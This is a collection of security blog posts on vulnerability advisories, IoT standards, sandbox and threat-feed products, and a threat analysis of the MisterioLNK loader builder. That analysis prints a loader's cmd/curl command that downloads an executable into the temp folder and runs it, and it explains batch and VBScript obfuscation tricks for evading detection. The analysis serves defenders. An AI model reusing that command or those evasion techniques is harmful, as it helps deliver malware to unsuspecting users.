Authentication codes from a service you don’t have an account with | Kaspersky official blog

We’ve previously covered what to do if you receive an unexpected one-time login code for one of your accounts (spoiler alert: it’s probably a hacking attempt, and it’s time to consider getting reliable protection for all your devices).

But sometimes the situation is different: you get a two-factor authentication code for a service where you’ve never had an account. In this post, we’ll discuss why this might happen, and how to react to such messages.

Why you might receive a code for an unknown account

There are two basic explanations for receiving one-time login codes for an account you’re certain doesn’t belong to you.

The first and most likely explanation: before you got your current phone number, it belonged to someone else. When they canceled their service, the number went back into circulation and eventually landed with you. This is called “phone number recycling” — a standard practice for mobile service providers.

Thus, the previous owner of your number registered an account using it. And now, either they’re trying to log in, or someone else is attempting to hack their account. As a result, one-time login codes are being sent to the number (which now belongs to you).

The less likely scenario is that someone is unintentionally trying to register an account using your phone number. Perhaps they mistyped their own number, or simply entered a random sequence of digits that happened to be yours.

What to do

No matter which of the above scenarios may have occurred, the good news is it’s not your problem. You don’t need to do anything and there’s nothing to worry about — unless you plan on creating an account with that service. If you do, you might run into a problem: your number is already associated with an existing (albeit abandoned) account. In that case, contact the service’s support team and explain the situation, and ask them to detach the unknown account from your number while mentioning that you’re a potential new customer.

If support can’t or won’t help, there’s nothing you can do except get an extra SIM card and link your account to the new number.

What NOT to do

Now, let’s talk about what you absolutely should not do: under no circumstances should you attempt to use the one-time codes you receive to access an account that doesn’t belong to you. Curiosity killed the cat, and in this case it could have serious consequences.

Accessing someone else’s account isn’t just unethical; it’s illegal in most jurisdictions. For example, in the U.S., the very strict Computer Fraud and Abuse Act (CFAA, 18 U.S.C. § 1030), covers this. Germany has a Section 202 of its Criminal Code (StGB $ 202), and the list goes on for most if not all countries worldwide. Although the probability of facing legal consequences for accessing someone else’s account may not be high, it’s not worth the risk.

Keep in mind that this probability increases significantly if the account is linked to illegal activity. In that case, law enforcement might take a keen interest in anyone who accesses the account, and sooner or later you could find yourself facing some very uncomfortable questions.

So, the best course of action when receiving a text message with a one-time login code for an account that doesn’t belong to you is to simply ignore it. And to avoid any unnecessary trouble, absolutely do not try to log in to someone else’s account.

Kaspersky official blog – ​Read More

Private AI Assistant for Malware Analysis in ANY.RUN Sandbox

We are excited to announce the release of an updated AI assistant, which brings powerful analysis capabilities right to your private sessions in the ANY.RUN sandbox. With our new assistant, we’ve taken things to the next level by combining deep, insightful analysis with the privacy and security you need. 

AI Reports Are Now Available for Private Sessions 

Previously, our AI assistant (powered by ChatGPT) was only accessible in public sandbox sessions. Now, it has been replaced with a new AI model fully hosted on our own infrastructure, allowing Hunter and Enterprise users to enjoy AI insights securely in private mode as well.

AI reviews inside ANY.RUN’s sandbox analysis session

With the updated version, you get detailed insights without any risk of your information being shared with third parties. Everything stays within your private session, so you can confidently analyze sensitive files and links with full privacy

Try malware analysis in private mode with ANY.RUN 



Request 14-day trial


How AI Assistant Helps with Malware Analysis 

Inside ANY.RUN’s sandbox, you’ll now find the AI button next to processes, Suricata rules, as well as other key elements in your analysis session.  

Click the AI button next to processes, events, and other elements to generate AI reports

By clicking the AI button, you can get detailed insights about what each element does in that specific context. This feature is designed to give you a clearer understanding of malicious behavior, speeding up your investigations and providing helpful summaries in real time. 

Here’s what AI assistant can do for you: 

1. Process trees: The AI assistant digs into the process tree, identifies suspicious behavior and offers summaries of each process, helping users focus on critical areas of interest. 

Analysis of processes by AI

2. Command line: It scans command line inputs, pinpointing potential indicators of malicious activity, and generates a detailed report to guide your investigation. 

Command line analyzed by AI

3. Suricata rule triggers: When Suricata rules are triggered, the AI assistant provides a clear explanation of what these triggers mean in the context of your security, helping you understand the potential threat level. 

Suricata rule analyzed by AI assistant

Try AI-powered malware analysis with ANY.RUN 



Create free account


4. HTTP connections: The assistant reviews HTTP connections, summarizing any suspicious behaviors or connections that may pose a risk to your network. 

HTTP requests analyzed by AI

5. Registry changes: The assistant flags unusual changes in the system registry, highlighting actions that could signal a malware threat. 

Registry changes analyzed by AI inside ANY.RUN

AI Summary Button: A Quick Threat Overview at Your Fingertips 

After analyzing various elements inside the session with AI, you can view all the generated reports conveniently through the AI Summary button.

You can find the AI Summary button in the top right corner of your sandbox session

This button, located in the top right corner of your ANY.RUN sandbox session, compiles all the AI reviews you’ve generated for processes, Suricata rules, and other components.

By clicking the AI Summary button, you get a quick and comprehensive overview of your analysis in one place, making it easy to see everything the AI has helped you review and understand during the session. 

Conclusion

With the addition of the AI assistant in private mode, you can benefit from AI-driven insights, summaries, and explanations while ensuring that your sensitive data remains completely protected.

See more recent updates from ANY.RUN in the September 2024 release notes.

About ANY.RUN    

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

Detect malware in seconds

Interact with samples in real time

Save time and money on sandbox setup and maintenance

Record and study all aspects of malware behavior

Collaborate with your team 

Scale as you need

Request free trial of ANY.RUN’s products →

The post Private AI Assistant for Malware Analysis <br>in ANY.RUN Sandbox appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Largest Patch Tuesday since July includes two exploited in the wild, three critical vulnerabilities

The largest Microsoft Patch Tuesday since July includes two vulnerabilities that have been exploited in the wild and three other critical issues across the company’s range of hardware and software offerings.  

October’s monthly security update from Microsoft includes fixes for 117 CVEs, the most in a month since July’s updates covered 142 vulnerabilities.   

The two vulnerabilities that Microsoft reports have been actively exploited in the wild and are publicly known are both rated as only being of “moderate” severity.  

CVE-2024-43572 is a remote code execution vulnerability in the Microsoft Management Console that could allow an attacker to execute arbitrary code on the targeted machine. Microsoft’s security update will prevent untrusted Microsoft Saved Console (MSC) files from being opened to protect users against adversaries trying to exploit this vulnerability.  

The security update will prevent untrusted Microsoft Saved Console (MSC) files from being opened to protect customers against the risks associated with this vulnerability. 

The other vulnerability that was exploited in the wild in this week’s security update is CVE-2024-43573, a platform spoofing vulnerability in Windows MSHTML. Platform spoofing vulnerabilities usually allow an adversary to gain unauthorized access to an environment by disguising themselves as a trusted source.  

CVE-2024-43583, an elevation of privilege vulnerability in Winlogon, has also been publicly disclosed, according to Microsoft, but has not yet been exploited in the wild. This vulnerability could allow an attacker to obtain SYSTEM-level privilege. In addition to applying the patch, Microsoft also recommends users enable a Microsoft first-party Input Method Editor (IME) on their devices to prevent adversaries from being able to exploit third-party IMEs during the sign-in process. 

October’s Patch Tuesday also includes three critical vulnerabilities that could all lead to remote code execution. 

CVE-2024-43468 is the most serious of this bunch, with a CVSS severity score of 9.8 out of 10. An attacker could exploit this vulnerability in Microsoft Configuration Manager to execute commands on the targeted server or underlying database. 

Another remote code execution vulnerability, CVE-2024-43488, exists in the Visual Studio Code extension for Arduino, an open-source platform for building and managing single-board microcontrollers and microcontroller kits. A missing authentication protocol could allow an adversary to execute remote code over the network.  

Microsoft stated that the company has already mitigated this vulnerability and users do not need to take any additional steps. This extension has also been deprecated and can no longer be downloaded from the internet. 

Lastly, CVE-2024-43582 exists in the Windows Remote Desktop Protocol server and could allow an attacker to execute code on the server side with the same permissions as the RPC service. An adversary could exploit this vulnerability by sending malformed packets to an RPC host. However, exploitation also requires that the adversary win a race condition first.  

Cisco Talos would also like to highlight several vulnerabilities that are only rated as “important,” but Microsoft lists as “more likely” to be exploited: 

CVE-2024-43502: Elevation of privilege vulnerability in Windows Kernel CVE-2024-43509 and CVE-2024-43556: Elevation of privilege vulnerabilities in Windows Graphics Component     CVE-2024-43560: Elevation of privilege vulnerability in Windows Storage Port CVE-2024-43581 and CVE-2024-43615: Remote code execution vulnerability in Microsoft OpenSSH for Windows  CVE-2024-43609: Spoofing vulnerability in Microsoft Office 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 64083 – 64086, 64089, 64090, 64111 and 64112. There are also Snort 3 rules 301034 – 301036 and 301041.

Cisco Talos Blog – ​Read More

Apple Issues Urgent Security Advisory for iOS and iPadOS Vulnerabilities

Overview

Apple has released a new security advisory highlighting the issues affecting Apple’s iOS and iPadOS platforms. As detailed in the advisory, two vulnerabilities have been identified, both of which affect Apple iOS and iPadOS up to version 18.0. The vendor is Apple, and patches are available for these vulnerabilities. 

The first vulnerability, CVE-2024-44204, relates to information disclosure and has been assigned a CVSSv3.1 score of 5.5, indicating a medium severity level. This vulnerability allows saved passwords to be read aloud by the VoiceOver feature, posing a significant privacy risk for users on affected iOS and iPadOS versions. A patch is available for this vulnerability.

The second vulnerability, CVE-2024-44207, also relates to information disclosure, with a CVSSv3.1 score of 4.3, again indicating medium severity. This issue affects audio messages in the Messages app, enabling a few seconds of audio capture before the microphone indicator activates. Such a flaw could result in unintended recordings. A security patch for this vulnerability is also available.

Apple has indicated that security updates addressing these vulnerabilities are included in the recent releases of iOS 18.0.1 and iPadOS 18.0.1.

Patch Details and Impact

The updates were released on October 3, 2024, and they specifically target a range of Apple devices. The vulnerability CVE-2024-44207 affects all iPhone 16 models, while CVE-2024-44204 impacts several devices, including the iPhone XS and later models, as well as various iPad Pro models (specifically the 13-inch and 12.9-inch 3rd generation and later), the iPad Air (3rd generation and later), and the iPad mini (5th generation and later).

Apple emphasizes the critical importance of security and maintains a policy of not disclosing details about vulnerabilities until a thorough investigation has been completed and patches are available. To enhance transparency, the vulnerabilities are referenced by their CVE IDs in Apple’s official documentation.

In a statement concerning the security content of the updates, Apple noted, “About the security content of iOS 18.0.1 and iPadOS 18.0.1. This document describes the security content of the updates.”

Historically, Apple products have been prime targets for cybercriminals who exploit vulnerabilities for various motives, including espionage and financial gain. The recent vulnerabilities discovered in iOS and iPadOS versions put sensitive user information at risk, highlighting the urgent need for immediate patching to protect against potential exploits.

Conclusion

The vulnerabilities identified in Apple’s iOS and iPadOS are a stark reminder of the evolving cybersecurity landscape. As cyber threats become increasingly sophisticated, users must prioritize the application of security patches to protect their sensitive information.

Recommendations and Mitigations


To mitigate the risks associated with these vulnerabilities, users are strongly advised to:

Regularly check for and install the latest security updates from Apple to ensure your devices are protected against known vulnerabilities.

Activate automatic updates on your devices to ensure that you receive security patches as soon as they are released, minimizing the risk of exposure.

Regularly review the permissions granted to apps, particularly those that access sensitive information, to ensure they align with your privacy preferences. 

Keep an eye on the activity logs and alerts on your devices for any unusual access or behavior that could indicate a breach.

Take advantage of built-in security features such as Face ID, Touch ID, and two-factor authentication to enhance the protection of your devices.

The post Apple Issues Urgent Security Advisory for iOS and iPadOS Vulnerabilities appeared first on Cyble.

Blog – Cyble – ​Read More

MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders

Cyble Research and Intelligence Labs (CRIL) has uncovered a new, previously undetected loader builder known as “MisterioLNK.” This discovery follows our earlier analysis of Quantum Software, another LNK file-based builder that has been gaining traction in the cyber landscape. MisterioLNK, available on GitHub, presents a significant challenge to security defenses, as files generated by this tool currently exhibit minimal or zero detection rates by conventional security systems.

As described on GitHub, MisterioLNK is an open-source loader builder that leverages Windows script engines to execute malicious payloads while employing obfuscation as well. It is crafted to operate discreetly, downloading files into temporary directories before launching them, thereby enhancing its evasive capabilities and making detection by traditional security measures difficult.

Key features of MisterioLNK include support for five loader methods—HTA, BAT, CMD, VBS, and LNK— as well as three obfuscation methods specifically for VBS, CMD, and BAT, with plans to add support for HTA obfuscation soon. Additionally, the tool supports customizing the icon of LNK files.

The project is currently in its beta phase, and the author has cautioned that bugs and issues may exist. They encourage users to report any problems via the GitHub Issues page. Furthermore, the author disclaims any responsibility for illegal activities conducted using this software, emphasizing that users must ensure their actions comply with relevant laws and regulations. The figure below shows the GitHub post by the developer.

Threat Actors (TAs) have started utilizing the MisterioLNK loader builder to generate obfuscated files for deploying malware, such as Remcos RAT, DC RAT, and BlankStealer. Alarmingly, these loaders are largely evading detection, with many remaining undetected by most security vendors.

For our research, we generated all combinations of the loader files to evaluate their detection capabilities. The samples created using the MisterioLNK builder revealed that out of six files, only one was detected with 16 detections, two files had one detection each, and three files showed zero detections. While security vendors are successfully detecting LNK and Obfuscated VBS loaders produced by this builder, the detection rates for BAT, CMD, HTA, and VBS loader files remain low, as shown in the figure below.

Technical Details

Misterio.exe, a .NET-based tool, consists of two primary modules: a loader builder and an obfuscator. The builder accepts a URL hosting a malicious second-stage payload and generates BAT, CMD, HTA, LNK, or VBS files based on the user’s selection. The generated files are designed to connect to the URL, download the payload, and execute it. Additionally, the builder can obfuscate BAT, CMD, and VBS loader files while allowing custom icons to be added. The figure below illustrates the Misterio Dropper.

BAT/CMD Loader and Obfuscator

The BAT/CMD loader generated by the builder is designed to download files from specified URLs using the `curl` command, followed by executing the downloaded files. The resulting script is saved with a custom file icon for enhanced deception. When obfuscation is enabled, the script undergoes an additional layer of concealment.

The obfuscation module uses a technique that inserts random strings between characters in the batch code. It processes each line of the script by appending random strings, enclosed in percent signs (%), to characters that are not already within percent signs. This approach introduces seemingly random data into the code to confuse static analysis tools while still allowing the script to run without issues. Additionally, a comment line is added at the start of the script, indicating that it was processed by “MisterioLNK.”

HTA Loader:

The HTA (HTML Application) loader generated by the builder utilizes JavaScript and ActiveX objects to execute commands for downloading and running files. While the obfuscation feature for HTA files is currently inactive, it could be implemented in the future. This approach creates an HTML file with embedded script content designed to execute seamlessly upon launch.

VBS Loader and Obfuscator:

The VBS Loader leverages a shell object to execute commands for downloading and running the target file. It supports obfuscation to enhance its stealth capabilities. The obfuscation process converts each character of the VBScript into its ASCII code representation using the `Chr()` function, resulting in a series of concatenated `Chr()` calls that reconstruct the original characters when executed. The obfuscated script is then encapsulated within an `Execute()` function, which evaluates and runs the concealed code. This approach effectively obscures the script’s logic, making it difficult for static analysis tools to interpret.

LNK Loader Builder:

The tool creates a shortcut file (.lnk) that, upon execution, triggers a command to download and run the target file. It also supports setting a custom icon for the LNK file to enhance its disguise. The target command created by the link builder is “C:Windowssystem32cmd.exe /c mode 15,1 & curl hxxps://live.sysinternals.com/du.exe -o %temp%ntvy4adp.exe & start /b %temp%ntvy4adp.exe”. The figure below shows the properties of the LNK file.

Together, these modules form a powerful toolkit for generating and concealing scripts that can deliver and execute payloads with minimal detection. Their design emphasizes flexibility, adaptability, and evasion, making them potent tools in the context of threat development while also highlighting the potential risks if misused.

Conclusion

MisterioLNK is a versatile loader builder designed to create and conceal scripts that download and execute payloads using various Windows script engines. With support for multiple file formats (BAT, CMD, HTA, VBS, and LNK) and advanced obfuscation techniques, MisterioLNK effectively evades detection by traditional security tools. While currently in beta, its adaptability and focus on evasion make it a significant threat in the cybersecurity landscape. The project’s open-source nature and disclaimers about legal responsibility highlight the potential for misuse.

Our Recommendations


Implement security solutions that can recognize and detect the specific obfuscation patterns and script formats generated by MisterioLNK Builder.

Use software restriction policies or application whitelisting to limit the execution of unauthorized scripts and reduce the attack surface for loaders like MisterioLNK.

Focus on behavioral detection strategies to identify suspicious activities, like the use of scripting engines to download and execute files, regardless of obfuscation.

Educate users about the risks associated with executing files from unknown or untrusted sources, emphasizing the dangers of seemingly benign shortcut files (.lnk).

MITRE ATT&CK® Techniques

Tactic 
Technique
Procedure

Execution (TA0002)
User Execution: Malicious File (T1204.002)
MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload, typically by tricking users into running the loader file.

Execution (TA0002)
Command and Scripting Interpreter (T1059)
Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system.

Execution (TA0002)
Command and Scripting Interpreter: Visual Basic (T1059.005)
Deploys obfuscated VBScript files that execute commands to download and run additional payloads.

Execution (TA0002)
Command and Scripting Interpreter: Visual Basic (T1059.003)
Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution.

Defence Evasion (TA0005)
Masquerading: Masquerade File Type (T1036.008)
Uses LNK files with altered icons to disguise the loader as a legitimate file, increasing the likelihood of user interaction.

Defence Evasion (TA0005)
Obfuscated Files or Information: Command Obfuscation (T1027.010)
MisterioLNK employs obfuscation techniques to hide the content of its scripts, making detection by security tools more difficult.

Defence Evasion (TA0011)
Application Layer Protocol: Web Protocols (T1071.001)
Uses HTTP/S through the curl command to communicate with remote servers to download payloads.

Indicators Of Compromise

Indicator
Indicator Type
Description

3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17
SHA256
Remcos

dba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1a353f72dba9ffa2b850
SHA256
Remcos

1be9fcca5fd587accd9dbfa1b6a67a2e6bb58465dd78f775c40f6eb6480bfb5f
SHA256
Remcos

64fd11a9befea1310503336a6a8194fca7ab7af291562787c4985d1a1f06b4e1
SHA256
Remcos

0d32a67ee4193520116d2435d1d579811c5ab71c7550d433948eb82e027cc601
SHA256
DC RAT

7f8737e14ca51c1724c0f65a568cefa4d9e1536416ddf89569eab2cce8ae2e01
SHA256
BlankStealer

The post MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders appeared first on Cyble.

Blog – Cyble – ​Read More

Trust and trustworthiness in the internet of things | Kaspersky official blog

The turbulent waters of the internet of things (IoT) will soon become more navigable — thanks to the recently adopted ISO/IEC 30141 standard, which defines reference architecture for IoT solutions. For our part, Kaspersky has been actively involved in the development of trust principles for IoT devices as laid out by the ISO/IEC TS 30149:2024 specification. Let’s use this example to explore why we need standards at all, what can be standardized in the IoT, and why IoT devices and their manufacturers must prove that they’re worthy of consumer trust.

Why we need standards

If you’re already familiar with the basic principles of standardization in electronics, feel free to skip ahead to the next section.

When you plug your smartphone’s charger into a hotel wall socket while on vacation, dozens of international standards are invisibly at play. Chargers are manufactured in accordance with IEC 60335-1:2020, which deals with the electrical safety of household appliances; plug shapes are governed by IEC 60906-1:2009 and its derivatives (such as CEE 7/16); and the supplied voltage itself is regulated by IEC 60038:2009+A1:2021. Widespread standardization has greatly simplified our lives: most countries worldwide use the same types of electrical appliances, barcodes on product packaging, and units of weight, length, and speed. In turn, unified approaches to controlling harmful substances in products, insulating and earthing household appliances, medication dosages, and traffic-sign coloring have massively improved safety and streamlined goods’ certification and testing.

The International Electrotechnical Commission (IEC) summarizes the benefits of standardization as follows. Standards:

Enable different products to interoperate
Are used in testing and certification to verify that manufacturers deliver on their promises
Contain technical details for inclusion in country-specific regulations
Simplify international trade

There are quite a few standardization bodies in existence — some regional, some industrial, some technical-field-specific. Besides the aforementioned IEC, there are, for example, the Internet Engineering Task Force (IETF) — responsible for developing internet standards; the American National Standards Institute (ANSI) — which issues standards for the US market; and the most universal of them all — the International Organization for Standardization (ISO). Where their areas of responsibility overlap, these bodies often collaborate to develop common recommendations. For example, electrical engineering standards are typically prefixed ISO/IEC.

Note that manufacturer compliance with any standard is voluntary. However, individual countries may prohibit the sale of, say, electrical appliances that don’t comply with local or international standards.

Standards for smart technology

Standards can describe not only the features of a finished product, but also how to manufacture it — addressing both hardware and software aspects. Therefore, the recently adopted ISO/IEC 30141:2024, which describes the architecture of IoT-related devices and services, is a logical — and long overdue — addition to the standards portfolio. Standardization based on this specification addresses several pressing issues:

Wireless sensors and the hubs they interact with will use the same protocols so that equipment from different vendors can interoperate in homes and within companies.
Standardized internet communications for IoT devices will reduce user dependence on the manufacturer (vendor lock-in), and eliminate situations where a server shutdown turns your smart home into a pumpkin — Cinderella-style.
A standardized approach to IoT-solution development will enable the use of more mature implementations of communication protocols. Furthermore, standard outline mandatory security measures and their implementation in both hardware and software aspects of devices. All of this will cut the number of IoT devices harboring glaring security issues (1, 2, 3, 4).

An important complement to IEC 30141 was the ISO/IEC TS 30149:2024 specification, released in May, which lays out principles for IoT trustworthiness. The document answers the question of how to prove that an IoT device is secure (rather than just relying on the vendor’s claims) — and Kaspersky helped develop it.

Five aspects of verifiable security

The key concept of the document is trustworthiness, which differs from trust. Trust is based on assumptions, some of which may be true and based on observable properties (“made of metal”), while others may be unfounded (“doesn’t contain secret backup passwords”). According to the specification, trustworthiness is the verifiable ability to meet expectations. ISO/IEC TS 30149:2024 details how trust, trustworthiness, and risk correlate, and describes five aspects in which an IoT solution’s trustworthiness can be demonstrated. These are:

Safety
Security
Privacy
Resilience
Reliability

For each of these aspects, trustworthiness is ensured through specific approaches to system design and construction. The document provides best-practice templates for building IoT systems and ensuring trust in them — from threat-assessment methodologies for trust-related violations, to architectural solutions for trusted systems (for example, MILS).

What to expect from the IoT of the future

The adoption of standards alone won’t magically improve IoT security overnight. Old products already no longer comply, while for new ones compliance with standards needs to become a requirement of both national and international regulators. Manufacturers would then need to invest considerable time in developing new products that comply with these standards. That said, in a few years, we can expect significant improvements in the security of both industrial and consumer IoT devices. These should include simple yet effective measures — such as secure default settings, and long, pre-defined periods for update delivery. More complex yet crucial improvements should include the widespread adoption of secure-by-design approaches, plus standardized, publicly-verified communication protocols to make products less vulnerable. With these in place, experts would be able to more easily analyze the security of specific products thanks to better-documented system and protocol architecture. And the ultimate goal: consumers knowing for sure that the IoT devices they purchase are secure, reliable, and resilient to threats (both physical and cyber) throughout the entire lifecycle of those IoT devices.

Kaspersky official blog – ​Read More

5 Characteristics of Good Threat Intelligence Feeds

In the rapidly evolving landscape of cybersecurity, access to high-quality threat intelligence feeds is crucial for detecting and mitigating threats in real time. Not all feeds are created equal, however, and choosing the right one can make a significant difference in your organization’s defense strategy.

Let’s explore five key characteristics of good threat intelligence feeds and demonstrate how ANY.RUN meets these essential standards. 

Quality of indicators 

False positives can cause unnecessary alerts, diverting the security team’s focus from real threats.

A good threat intelligence feed should focus on the accuracy and relevance of indicators. High-quality feeds filter out false positives, duplicates, and outdated data to ensure that the indicators of compromise (IOCs) are actionable.

At ANY.RUN, we emphasize the purity of our data. Our feed data undergoes rigorous pre-processing, leveraging advanced algorithms and proprietary technology to minimize false positives.

Thanks to our interactive sandbox, we capture valuable information such as domains and URLs from each session, ensuring that our users get only the most relevant and accurate IOCs in their feeds. 

Remcos malware configuration extracted by the ANY.RUN sandbox

We also extract IOCs from malware configurations. This is the most valuable source of quality IOCs, as it contains critical data that threat actors use to run their operations.  

Volume of threat data 

While quality is essential, the quantity of data should not be overlooked. A good threat intelligence feed draws from a large, diverse pool of sources to provide a broad view of emerging threats. The more varied and widespread the data sources, the more comprehensive the threat intelligence. 

At ANY.RUN, we have an expansive community of over 500,000 analysts from around the globe, continuously submitting fresh public samples of malware and phishing to our sandbox for analysis. In Q2 2024 only, ANY.RUN users ran 881,466 public interactive analysis sessions. 

This ensures our threat intelligence feeds are populated with indicators from various geographical regions and attack vectors.

Integrate ANY.RUN TI Feeds into your security systems 



Try demo sample


Freshness of data 

The speed at which threat intelligence feeds are updated is another critical factor. Timely data is essential for defending against fast-moving cyber threats. Feeds that rely on outdated data leave organizations vulnerable to attacks. The best feeds provide real-time or near-real-time updates to ensure their users stay ahead of emerging threats.

Public samples of malware and phishing submitted to ANY.RUN’s sandbox

ANY.RUN’s Threat Intelligence Feeds are continuously updated every few hours, drawing from live public sessions in our sandbox environment. This rapid update cycle ensures that our users receive fresh data on the latest threats, significantly reducing the detection lag. With near real-time updates, security teams can react quickly to new threats and enhance their overall defense strategy. 

Data enrichment 

Basic threat feeds usually offer limited information, such as IP addresses or file hashes. However, enriched threat intelligence provides valuable context, such as TTPs, URLs, and full analysis reports. This additional context allows security teams to better understand the nature of the threat, enabling more effective responses. 

Analysis of the LockBit malware in the ANY.RUN sandbox 

Our feeds go beyond simple IOCs by providing direct links to full sandbox analysis sessions. For each indicator in our feeds, users can view the entire malware interaction, including memory dumps, network traffic, and event timelines.  

This level of enrichment gives analysts deeper insight into the behavior of the malware, helping them make more informed decisions. Moreover, we support integrations with tools like OpenCTI to pull in even more enriched data for a holistic analysis. 

Compatibility and format 

Threat intelligence feeds should be easy to integrate into existing systems, using widely supported formats such as STIX or TAXII. Compatibility is key to ensuring that feeds can be effectively utilized by Security Information and Event Management systems, Threat Intelligence Platforms, and other security tools. 

At ANY.RUN, we deliver our threat intelligence feeds in the STIX format, making it simple for security teams to integrate our data into their existing infrastructure. Here is how it looks like:

{
“type”: “ipv4-addr”,
“id”: “ipv4-addr–8c851c0c-ee42-5e7e-af06-f849efc0ffb4”,
“value”: “194.104.136.5”,
“created”: “2022-04-20T15:05:54.181Z”,
“modified”: “2024-02-19T11:21:47.728Z”,
“external_references”: [
{
“source_name”: “ANY.RUN task c761d29c-a02a-4666-bc34-b89c4aab5cd1”,
“url”: “https://app.any.run/tasks/c761d29c-a02a-4666-bc34-b89c4aab5cd1”
},
{
“source_name”: “ANY.RUN task 49e5fc75-a203-4d98-b055-ce41b0597a42”,
“url”: “https://app.any.run/tasks/49e5fc75-a203-4d98-b055-ce41b0597a42”
},
{
“source_name”: “ANY.RUN task 3438d5ce-3cfa-4ccc-9638-5d92ad34b406”,
“url”: “https://app.any.run/tasks/3438d5ce-3cfa-4ccc-9638-5d92ad34b406”
},
{
“source_name”: “ANY.RUN task e4ca3451-ce2c-4974-a6f5-baf3e81b5aff”,
“url”: “https://app.any.run/tasks/e4ca3451-ce2c-4974-a6f5-baf3e81b5aff”
}
],
“labels”: [
“RedLine”
]
}

The STIX format ensures that our enriched threat data is compatible with a wide variety of tools and platforms, enabling organizations to seamlessly incorporate our feeds into their broader threat detection and response workflows. 

Read more about ANY.RUN’s TI Feeds in the official documentation.

Try Demo TI Feeds from ANY.RUN 

Choose the indicators you want to receive and get your sample of ANY.RUN’s TI Feeds

You can experience the power of threat intelligence feeds with ANY.RUN. Our feeds include accurate IOCs for precise threat identification:

Command-and-control (C2) IP addresses: Addresses used by malware to communicate with attackers. 

URLs and domain names: Suspicious sites associated with malicious activities. 

Try a demo sample of our TI Feeds to test them and see how they can contribute to your security.

Wrapping up 

Good threat intelligence feeds are accurate, comprehensive, timely, enriched with contextual information, and easy to integrate. ANY.RUN’s Feeds check all these boxes, offering a robust solution to stay ahead of the ever-evolving threat landscape.

Whether you’re a small business or a large enterprise, integrating high-quality threat intelligence like ours can significantly enhance your cybersecurity posture. 

About ANY.RUN    

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, Yara Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

Detect malware in seconds

Interact with samples in real time

Save time and money on sandbox setup and maintenance

Record and study all aspects of malware behavior

Collaborate with your team 

Scale as you need

Request free trial of ANY.RUN’s products →

The post 5 Characteristics <br>of Good Threat Intelligence Feeds appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

CISA Flags Multiple Critical Vulnerabilities Exposed Across Major Platforms

The Cybersecurity and Infrastructure Security Agency (CISA) has added multiple vulnerabilities to its known Exploited Vulnerabilities (KEV) catalog. A total of six vulnerabilities have been identified across various products, including Zimbra Collaboration, Ivanti, D-Link, DrayTek, GPAC, and SAP. Notably, these vulnerabilities span a range of severity levels, from critical to medium, demanding immediate attention.

One of the most interesting entries is CVE-2024-45519, associated with Zimbra Collaboration. This critical vulnerability has been assigned a CVSS score of 9.8, indicating its severe nature. The issue arises from the postjournal service in specific versions of Zimbra, which may permit unauthenticated users to execute commands. 

This vulnerability was first analyzed by researchers from ProjectDiscovery, who demonstrated a Proof of Concept (PoC) exploit. On October 1, 2024, security researcher Ivan Kwiatkowski reported that mass exploitation of this vulnerability had commenced, with Cyble’s ODIN scanner revealing 35,315 internet-facing ZCS instances at the time of the advisory’s publication.

Another critical vulnerability highlighted is CVE-2024-29824 in Ivanti’s Endpoint Manager (EPM) 2022. This high-severity SQL Injection vulnerability allows an unauthenticated attacker within the same network to execute arbitrary code. Exploitation attempts have been noted by the Shadowserver Foundation, highlighting the urgency of patching this vulnerability, which carries a CVSS score of 8.8.

The advisory also discusses CVE-2023-25280, a critical OS injection vulnerability affecting D-Link devices. This flaw, which allows an attacker to manipulate system commands through insufficient validation of the ping_addr parameter.

Other Notable Vulnerabilities

Additionally, CVE-2020-15415 affects several models of DrayTek routers, allowing remote command execution via OS injection. With a CVSS score of 9.8, this vulnerability is deemed critical and must be addressed urgently. Cyble’s ODIN scanner indicated that 275,109 instances of affected routers are currently exposed, emphasizing the widespread risk.

Furthermore, CVE-2021-4043 represents a medium-severity vulnerability in the GPAC repository, which may lead to a denial-of-service (DoS) condition. Finally, CVE-2019-0344 in SAP Commerce Cloud also poses a critical risk due to unsafe deserialization, allowing arbitrary code execution with minimal authentication requirements.

The addition of these vulnerabilities to CISA’s KEV catalog is a clear indicator that threat actors are actively exploiting them. Organizations must recognize that vulnerabilities listed in the KEV catalog represent real-world risks, not just theoretical concerns. Failure to address these issues can lead to severe consequences, including data breaches, ransomware attacks, and privilege escalation.

Conclusion

CISA’s advisory highlights the urgent need for organizations to address vulnerabilities that have been identified and exploited in the wild. With the cyber threat landscape continuously evolving, timely patching and the adoption of better security practices are essential to safeguarding sensitive information and maintaining organizational integrity.

Recommendations and Mitigations


To combat these vulnerabilities effectively, organizations are urged to implement several key strategies:

Regularly apply the latest patches from official vendors for all software and hardware systems. Establish a routine for patch management, prioritizing critical updates.

Develop a comprehensive patch management process that encompasses inventory management, assessment, testing, deployment, and verification of updates. Automate where possible to improve efficiency.

Implement proper network segmentation to protect critical assets. This can be achieved through firewalls, VLANs, and strict access controls, effectively minimizing exposure to potential threats.

Maintain an updated incident response plan detailing procedures for detecting, responding to, and recovering from security incidents. Regularly test and refine this plan to ensure its effectiveness.

